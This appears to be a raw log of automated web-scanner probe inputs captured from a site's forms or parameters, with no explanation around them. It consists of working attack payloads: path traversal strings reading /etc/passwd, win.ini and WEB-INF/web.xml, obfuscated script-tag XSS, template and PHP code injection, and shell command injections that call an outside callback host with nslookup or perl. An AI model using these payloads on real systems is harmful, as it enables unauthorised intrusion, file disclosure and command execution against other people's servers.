..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%2G5C(9650)
'"()&%2G5C(9256)
19354710
acu2603%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2603
acux9460%C0%BEz1%C0%BCz2a%90bcxuca9460
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
12G5C(9939)
1IWMOT[!+!]
12G5C(9868)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%32%47%35%43%28%39%37%33%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
12G5C(9973)
1
12G5C(9897)
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%32%47%35%43%289313%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\2G5C(9870)\u003C/sCripT\u003E
1<ScRiPt>2G5C(9261)</sCripT>
?
1
1}body{acu:Expre/**/SSion(2G5C(9161))}
1
18QJNo
2G5C(9441)
1MQR9D[!+!]
1
1
1
1
1'"()&%OtJO(9442)
'"()&%OtJO(9145)
19717066
1
acu7067%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7067
acux7886%C0%BEz1%C0%BCz2a%90bcxuca7886
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1OtJO(9273)
1HYGQK[!+!]
1OtJO(9146)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4F%74%4A%4F%28%39%34%37%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1OtJO(9196)
1
1OtJO(9558)
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%4F%74%4A%4F%289614%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\OtJO(9715)\u003C/sCripT\u003E
1<ScRiPt>OtJO(9774)</sCripT>
?
1
1}body{acu:Expre/**/SSion(OtJO(9109))}
1
1bAEHS
OtJO(9175)
16UW1M[!+!]
1
1
1
1
1'"()&%chAq(9206)
'"()&%chAq(9469)
19592507
acu6932%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6932
acux4411%C0%BEz1%C0%BCz2a%90bcxuca4411
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1'"()&%pbal(9130)
1chAq(9714)
'"()&%pbal(9595)
15LHIL[!+!]
19324215
1chAq(9145)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%68%41%71%28%39%35%37%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
acu7810%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7810
1chAq(9679)
acux3936%C0%BEz1%C0%BCz2a%90bcxuca3936
1
1chAq(9905)
1
1
1
1
1
1}}"}}'}}1%>"%>'%>
1
1
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
1
1
acx__${98991*97996}__::.x
%31%3C%53%63%52%69%50%74%20%3E%63%68%41%71%289885%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1pbal(9612)
1\u003CScRiPt\chAq(9976)\u003C/sCripT\u003E
1IDC8D[!+!]
1pbal(9592)
1<ScRiPt>chAq(9622)</sCripT>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%62%61%6C%28%39%34%35%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
?
1
1pbal(9642)
1
1}body{acu:Expre/**/SSion(chAq(9853))}
1pbal(9661)
1
1KazRJ
chAq(9000)
1
14MLZO[!+!]
1
1
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%70%62%61%6C%289158%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\pbal(9001)\u003C/sCripT\u003E
1<ScRiPt>pbal(9166)</sCripT>
?
1
1}body{acu:Expre/**/SSion(pbal(9838))}
1
1mahEV
pbal(9229)
1JPLMT[!+!]
1
1
1
1
kYlIeuLa
${10000375+10000240}
&n935791=v901375
1BqKpV5slNO
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'"
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(112).concat(85).concat(100).concat(86)+(require"socket" Socket.gethostbyname("hitwv"+"apcvhbzz8d5f4.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(116).concat(76).concat(105).concat(70)+(require'socket' Socket.gethostbyname('hitbg'+'aagwkmumfc22a.bxss.me.')[3].to_s)+'
bxss.me/t/xss.html?%00
'.gethostbyname(lc('hitrf'.'stjwbrhj2cec2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(118).chr(82).'
".gethostbyname(lc("hiths"."efcifqif494ad.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(79).chr(118).chr(89)."
)
!(()&&!|*|*|
^(#$!@#$)(()))******
response.write(9936057*9753175)
12345'"\'\");|]*%00{%0d%0a%bf%27'????
'+response.write(9936057*9753175)+'
"+response.write(9936057*9753175)+"
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
Http://bxss.me/t/fit.txt
/xfs.bxss.me
http://bxss.me/t/fit.txt%3F.jpg
911386
bxss.me
http://xfs.bxss.me
//xfs.bxss.me
/\xfs.bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
../../../../../../../../../../../../../../etc/passwd
";print(md5(31337));$a="
../../../../../../../../../../../../../../windows/win.ini
${@print(md5(31337))}
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
${@print(md5(31337))}\
../../../../../../../../../../etc/passwd%00.jpg
'.print(md5(31337)).'
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
echo vkacjs$()\ hrczet\nz^xyu||a #' &echo vkacjs$()\ hrczet\nz^xyu||a #|" &echo vkacjs$()\ hrczet\nz^xyu||a #
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
&echo rgrypa$()\ fbmdex\nz^xyu||a #' &echo rgrypa$()\ fbmdex\nz^xyu||a #|" &echo rgrypa$()\ fbmdex\nz^xyu||a #
/WEB-INF/web.xml
|echo uxywry$()\ kwpmse\nz^xyu||a #' |echo uxywry$()\ kwpmse\nz^xyu||a #|" |echo uxywry$()\ kwpmse\nz^xyu||a #
C:\WINDOWS\system32\drivers\etc\hosts
(nslookup hitoxsqznbarz03b93.bxss.me||perl -e "gethostbyname('hitoxsqznbarz03b93.bxss.me')")
../../../../../../../../../../windows/win.ini%00.jpg
$(nslookup hitnyomxihrzof08a8.bxss.me||perl -e "gethostbyname('hitnyomxihrzof08a8.bxss.me')")
&(nslookup hitcnzvomrdrv7706a.bxss.me||perl -e "gethostbyname('hitcnzvomrdrv7706a.bxss.me')")&'\"`0&(nslookup hitcnzvomrdrv7706a.bxss.me||perl -e "gethostbyname('hitcnzvomrdrv7706a.bxss.me')")&`'
/../../../../../../../../../../boot.ini
|(nslookup hityjrojhltbk3108a.bxss.me||perl -e "gethostbyname('hityjrojhltbk3108a.bxss.me')")
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
`(nslookup hitfziuobmvqe82fa2.bxss.me||perl -e "gethostbyname('hitfziuobmvqe82fa2.bxss.me')")`
..\..\..\..\..\..\..\..\windows\win.ini
;(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")|(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")&(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%SdOc(9216)
1'"()&%HcUW(9191)
'"()&%HcUW(9659)
'"()&%SdOc(9834)
19608113
19850150
acu9814%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9814
acu4718%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4718
acux8152%C0%BEz1%C0%BCz2a%90bcxuca8152
acux2344%C0%BEz1%C0%BCz2a%90bcxuca2344
1
1
1
1}}"}}'}}1%>"%>'%>
1
1
acx{{98991*97996}}xca
1}}"}}'}}1%>"%>'%>
1
acx[[${98991*97996}]]xca
acx{{98991*97996}}xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx[[${98991*97996}]]xca
1HcUW(9079)
acx__${98991*97996}__::.x
1NNGAG[!+!]
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1HcUW(9279)
1SdOc(9368)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%48%63%55%57%28%39%34%37%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1VPEWY[!+!]
1HcUW(9373)
1SdOc(9556)
1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%64%4F%63%28%39%31%30%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1HcUW(9496)
1SdOc(9250)
1
1
1'"()&%vx9d(9840)
1
1SdOc(9518)
'"()&%vx9d(9349)
1
19371939
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%48%63%55%57%289144%29%3C%2F%73%43%72%69%70%54%3E
1
1\u003CScRiPt\HcUW(9052)\u003C/sCripT\u003E
1
1<ScRiPt>HcUW(9312)</sCripT>
1
?
